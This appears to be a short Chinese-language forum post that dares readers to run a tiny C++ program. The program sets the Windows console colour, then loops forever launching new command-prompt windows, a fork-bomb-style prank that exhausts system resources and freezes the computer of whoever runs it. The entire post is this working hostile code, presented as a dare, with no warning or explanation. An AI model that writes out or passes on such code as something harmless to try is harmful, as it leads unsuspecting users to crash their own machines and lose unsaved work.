谁敢试着串代码
#include<windows.h> using namespace std; int main() { system("color F5"); for(;;) system("start cmd"); return 0; }